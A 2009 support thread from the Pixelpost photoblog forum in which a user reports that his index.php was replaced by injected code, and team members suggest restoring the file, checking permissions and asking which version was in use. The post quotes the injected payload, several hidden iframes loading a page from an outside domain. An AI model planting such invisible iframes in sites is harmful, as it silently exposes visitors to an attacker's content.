Pixelpost

Authentic Photoblog Flavour


Go Back   Pixelpost Forum > SUPPORT / INFORMATION > Pixelpost Help

Post Reply
 
Thread Tools
  #1  
Old 02-08-2009, 10:39 AM
dgoering Offline
forum loafer
 
Join Date: Jan 2008
Posts: 9
Unhappy Site injected yet again...

Ok, this is the third time that this has happened.
Somehow someone (or a bot I don't know) has injected my index.php with code.
My index.php is empty except for
PHP Code:
<iframe src="http://buillding.net/session/index.php" style="display:none"></iframe><iframe src="http://buillding.net/session/index.php" style="display:none"></iframe><iframe src="http://buillding.net/session/index.php" style="display:none"></iframe
I have contacted my provider and they say that they couldn't find anything suspicious in the logs, and it must be a security flaw in the script I am using.

Anyhow my question is how I can easily restore the index.php? As far as I can tell, the rest is still working. When I open the administration area that works fine and all my images are still there.
Any ideas how to get the site back up and running, or any thoughts at all on my problem are greatly appreciated.
Reply With Quote
  #2  
Old 02-08-2009, 01:18 PM
jaywilliams's Avatar
jaywilliams+ Offline
Team Pixelpost
 
Join Date: Sep 2005
Posts: 1,003
Send a message via AIM to jaywilliams Send a message via MSN to jaywilliams Send a message via Yahoo to jaywilliams Send a message via Skype™ to jaywilliams
You can re-download pixelpost, and replace the index.php file from the zip file.

Also, I'd suggest making sure your file permissions are set correctly, and to be even more safe, I'd suggest changing your password.
__________________
Jay Williams | A Different View
Reply With Quote
  #3  
Old 02-08-2009, 05:40 PM
dgoering Offline
forum loafer
 
Join Date: Jan 2008
Posts: 9
Ok I will try and change the index.php to the original and see if that works... the permissions are set to 644 which should be ok, and I already changed my password.
It would still be nice to know if its a security hole in the script or in my Server settings or even my providers....
Reply With Quote
  #4  
Old 02-09-2009, 05:55 PM
Dkozikowski's Avatar
Dkozikowski+ Offline
Team Pixelpost
 
Join Date: Oct 2005
Posts: 1,855
Send a message via AIM to Dkozikowski
What version of Pixelpost were you using when the injection occurred?
Reply With Quote
Post Reply


Thread Tools




All times are GMT. The time now is 02:24 PM.

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd. | Style Design: d3 designs